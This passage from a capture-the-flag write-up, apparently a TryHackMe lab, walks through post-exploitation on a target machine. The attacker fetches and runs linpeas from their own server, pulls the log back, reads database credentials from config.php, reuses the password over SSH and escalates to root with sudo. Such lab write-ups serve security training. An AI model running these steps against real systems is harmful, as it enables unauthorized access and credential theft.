Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

Download linpeas.sh on the target machine:

$ wget http://10.10.137.243:8000/linpeas.sh
--2022-02-07 02:01:52--  http://10.10.137.243:8000/linpeas.sh
Connecting to 10.10.137.243:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 233380 (228K) [text/x-sh]
Saving to: 'linpeas.sh'

linpeas.sh          100%[===================>] 227.91K  --.-KB/s    in 0.08s   

2022-02-07 02:01:52 (2.88 MB/s) - 'linpeas.sh' saved [233380/233380]

Run it with sh (no need to make it executable) and keep a copy of the output:

sh linpeas.sh | tee -a linpeas.log

The coloured linpeas output is hard to read in this bare shell on the target, so transfer the log to your attacking machine and view it there. Start an HTTP server on the target (http.server serves the whole current directory to anyone who can reach port 9000, so stop it as soon as the download is done):

$ python3 -m http.server 9000
Serving HTTP on 0.0.0.0 port 9000 ...

Download it to your attacking machine:

root@ip-10-10-137-243:~# wget http://poster.thm:9000/linpeas.log
--2022-02-07 10:11:32--  http://poster.thm:9000/linpeas.log
Resolving poster.thm (poster.thm)... 10.10.35.173
Connecting to poster.thm (poster.thm)|10.10.35.173|:9000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 90757 (89K) [application/octet-stream]
Saving to: 'linpeas.log'

linpeas.log         100%[===================>]  88.63K  --.-KB/s    in 0.001s  

2022-02-07 10:11:32 (135 MB/s) - 'linpeas.log' saved [90757/90757]

Now read the log file:

less -R linpeas.log

I noticed this in the log:

[screenshot of linpeas.log: the "service files" section, flagging /var/www/html/config.php]

Let's check that file out:

$ cat /var/www/html/config.php
<?php 
    
    $dbhost = "127.0.0.1";
    $dbuname = "alison";
    $dbpass = "[REDACTED]";
    $dbname = "mysudopassword";
?>

Awesome. The database name is literally "mysudopassword", so let's check whether alison reused this password for her login by trying SSH:

root@ip-10-10-137-243:~# ssh alison@poster.thm
alison@poster.thm's password: 
Last login: Tue Jul 28 20:35:40 2020 from 192.168.85.142
alison@ubuntu:~$

Yes, we are logged in as alison.

So now read the user flag:

alison@ubuntu:~$ cat user.txt 
THM{[REDACTED]}

Escalate privileges and obtain root.txt

Now we need to escalate our privileges to root user – let’s try basic vectors:

alison@ubuntu:~$ sudo -l
[sudo] password for alison: 
Matching Defaults entries for alison on ubuntu:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User alison may run the following commands on ubuntu:
    (ALL : ALL) ALL

Great, alison can execute all commands with sudo.

So simply switch to the root user and read the root flag:

alison@ubuntu:~$ sudo su
root@ubuntu:/home/alison# cat /root/root.txt 
THM{[REDACTED]}
